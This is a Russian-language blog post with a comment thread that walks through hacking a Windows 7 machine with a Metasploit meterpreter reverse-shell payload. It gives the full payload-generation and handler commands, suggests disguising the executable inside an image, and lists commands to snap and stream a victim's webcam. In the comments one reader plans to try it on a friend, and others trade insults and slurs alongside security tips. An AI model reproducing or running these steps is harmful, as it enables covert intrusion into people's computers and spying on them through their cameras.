Доброго времени суток! Наткнулся на статью т.н. анал кавказ где говорилось, о якобы залива шелла и слива базы, первое что попалось на глаза, это скрин сделанный ими с ОС виндовс 7 — первая мысль, школоло! так оно и оказалось в дальнейшем, капнув чуть глубже! Но это другая тема! Поговорим друзья о уязвимости Windows 7 и взлома web камеры…
И так начнем:
Для начала нам нужно, создать вредоносный исполняемый файл run_me.exe, который в BackTrack создается так, как показано ниже:
# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 X > /root/Desktop/run_me.exe
LHOST=192.168.1.5 – IP-адрес атакующего
LPORT=4444 – порт атакующего
Запускаем Metasploit:
# msfconsole
Далее вводим команды:
> use exploit/multi/handler > set payload windows/meterpreter/reverse_tcp > set lhost 192.168.1.5 > exploit
Теперь нам нужно, что пользователь запустил файл run_me.exe. Как это добиться уже другая история, как вариант можно засунуть вредоносный файл в другой файл. Например, как скрыть/склеить exe-файл в jpg можете прочитать тут. Это не единственный вариант, поэтому вооружайтесь googl’ом.
После того, когда жертва запустит файл, мы получим контроль над системой с привилегиями SYSTEM. Теперь можно делать все, что угодно! Но сейчас будем подсматривать за пользователем.
Сначала посмотрим, есть ли вообще у него web-камера?
meterpreter > webcam_list 1: Logitech Webcam 120
Если повезло делаем снимок:
meterpreter > webcam_snap
Так же можно попробовать запустить web-камеру в режиме реального времени. Делается это следующей командой:
meterpreter > run webcam -p /var/www
После чего откроется браузер и вы будете видеть то, что видит камера. Если браузер не откроется, значит откройте его сами и в адресной строке введите:
/var/www/webcam.html
Как видите ничего сложного нет…
Хохла пендоские страдания по Крыму :
13-летняя девочка умерла после первой брачной ночи
Мы все под колпаком у Мюллера.
Кто создавал те в курсе, у всего свой язык.
Канишна в курсе
Киса в курсе?
у меня кум програмист , и муж компьютерный гений )) так что у меня все безопасно. а айпи почему то скачет все время , то уренгой то красноярск то москва , воще каждый час меняется))
п.с. вот нафига ты вахаепам подсказываешь что делать ? я с тя воще немогу.
зацепило просто…
Заклейте вебку скотчем
++++ )))
у меня ее нет )) паламатая вощем камера ))
Интересно, интересно…
Меня конечно предупреждали о том, что нельзя покупать ноуты, неуты со встроенными вебками, нооо…… Не думала что так легко всё…..
Такая тема давно не актуальна, в кали линукс есть инструменты помощнее. И вообще, зачем такое выкладывать тут, в блог? Кавказхабр )))? Лучше проанализируйте последние статьи на кавполите, такое ощущение, что они боятся притока денег в нашу республику.
ОООО …. прям в точку))) Неделю назад наблюдал картину: Голосование на Кавполите о том какой субъект СКФО наиболее привлекателен для привлечения инвесторов. так там лидировал Дагестан за ним Ставропольский край а потом уже Чечня. и там интересный момент: Чечня в последний день резко поднялась в рейтинге и обошла СК за тем медленно и стремительно догоняла РД. В итоге Дагестан они не догнали и решили слить голосование и убрали его с сайта. Сдрейфили…..
Да людям на срать на благосостояние республики, главное вебку взломать. Плюс ко всему своему поведению хотят вывести республику с хауса, наверное крещеный мусульманин старается!
эксплоиты не актуальны?
Ты думаешь в Дагестане у всех белые ай пи адреса ? А вдруг кто использует впн, будешь виртуальную машину ломать ?
Картинки даже дети не открывают от незнакомых людей, плюс антивирусы стоят у всех
я думаю что это действенно! а как ты его криптовать будешь — это уже другой вопрос… по поводу кали скажу одно — разницы между ней и бэктрек нет, на мой взгляд… и там и там одно ядро… если ты понимаешь о чем я
Понятия не имею
В Дагестане процентов за 90 пользователей ставят всякие переделанные Windows.
В таких сборках Windows много всяких встроенных хакерских программ..
О чем вы пишете, с чем это едят, ниче не понимаю
Чел учит сниффер делать, злоупотребление блогом.
инферно ,колись, подглядываешь за нами через такую програмку ? насколько я поняла чтоб всучить какую то фигню кому либо , нужно знать его айпи адрес ))ща попробую за подружкой по наблюдать )0 ее айпи я знаю
Нет, там нужно закрепить сниффер к фотке и отправить жертве, старый трюк, такой даже сервис был. Антивирус визжит от такого
хы хы , у подруги нет антивирусника ахаха ща попробую. а и кстати а в телефон такую шняготень всучить можно? ну в андроид ?
Даже не знаю, андроид сама по себе слабая система, ну в зависимости какие права на ней установлены
Андрюха уязвим… Пароли ломают ххаки
вопрос времени.. Ну, а так, отдел £ держит и этот момент на контроле 
да возможно, ток по другому делается все… как запилят it безопасности сделаю…
какой сниффер? ты о чем вообще?
там не нужен ее айпи — эксплоит это исполняемый exe файл, сделай так как описано выше и все…
к тебе вопрос , что за фиговина телеграм — приложение что то типо вайбера и вацапа ? и есть ли это фиговина на русском ?
Telegram это приложение для мгновенного обмена сообщениями, которое, так же как и аналогичные приложения, такие как Viber, WhatsApp, и LINE, предоставляет вам простой и доступный способ общаться со всеми вашими контактами. Главное отличие от этих приложений заключается в том, что Telegram, помимо всего, обеспечивает повышенную безопасность и конфиденциальность.
очередная фигня.. на русском нет, но можно сделать и на русском если надо… а так не советую пользоваться тем, что требует привязки к номеру телефона…
у меня все номера левые ))мне нестрашно)) да и научили меня полностью чистить телефон ))
ну смотри сама)
Так чтоб схавать эту экзэшку надо просто глянуть фото или на машину сохранить?
Надо вебку заклеить, а то прям на кровать смотрит
А говорят, что блэкберри телефоны нельзя прослушать .
хммм это типа вип класса как у кое кого вредного да ?
Не до такой степени)
где я слышала это блэкбери … блин …уммм кажется я припоминаю у кого такая трубка…. ша погуглю)) картинку поищу
нашла мать того итти 95 тыщ за мобилу ? вот же гад это ж скока он зарабатывает ….. хммм, вжизни бы стока денег за какую то трубку не отдала .. нокиа фонарик-сила! неубиваемый воще
Купил кучу разноцветных панелей и радуйся
у меня мобилки очень долго держаться даже нокиа 3310 досих пор живой и вполне нормально работает. а воще самая любимая модель самсунг слайдер )) я очень долго отказывалась от приобритения андроида и то не сама купила подарили на 8 марта, я долго матьгалась и кричала лучше бы духи купил. неделю немогла понять что к чему в этой гробине ))
Там Бородина за даргинца вышла ) лезгинку танцуют, деньги кидают
Бородина ? это проститутка которую тока ленивый не имел с дома два ? она что ли ?
Ага
Инстаграм пестрит фотками и видео
Ну ты жжжжешь
Ахх-аах … Всем привет!
Местные камменторы фшоках. Аффтар, у тебя на индексе горизонт сильно завален … всякой хернёй
Какой нах бэктрэк, если местное большинство в примитивном html нихера не разбираются, а некоторые даже видео скачать не умеют
Даг-публика брутальна, в основном. Намаз сделать или напиз!дить кого на улице — это кулл.
п.с. Вообще-то я за ликбез по вопросам ПК, только нужно учитывать, что контингент в возрасте и весьма далёк от сложных и ненужных заморочек. Только самое необходимое и по минимуму.
☞ *https://www.freedrweb.ru/download+cureit+free/?lng=ru
Хотя бы раз в полгода пользуйтесь, а то я два месяца назад у знакомого в гостях был, так от нех делать качнул ему на комп Dr.Web CureIt .. аж 17 вирусов, половина из которых целыми пакетами и в каждом ещё штук по пять. Файрвол блять отключен …
Зашёл с его компа сюда ☞ *http://2ip.ru/port-scaner/ — 11 каких-то левых портов открыто. В общем, полная жопа огурцов.
Совет:
1. Comodo Firewall
2. Dr.Web
3. .. и никаких половых связей без ган!донов ))
и где ты был 4 месяца назад с третьим пунктом ? че раньше совет дать не мог ? мне ? хы хы
И ещё …
для салафитских недоумков, корячущихся иногда на сайте и некоторых хитрожопых троллей … спрятавшись за прокси нихера не видно вашего настоящего айпишника ))
☞ *https://diafygi.github.io/webrtc-ips/
п.с. Привет Kisa. Поздравляю с 4-ым месяцем ))
нелюблю я этот веб , авира мне нравиться больше.
а некоторые даже видео скачать не умеют (я) я умею, меня админ научил, и качать и заливать , хи хи
Сижу на Debian, полет нермальный.
А как ведет себя антивирус при запуске шела ? ну если соответственно включены модули всякие.. И какова роль антивируса в жизни пК в плане зашиты ?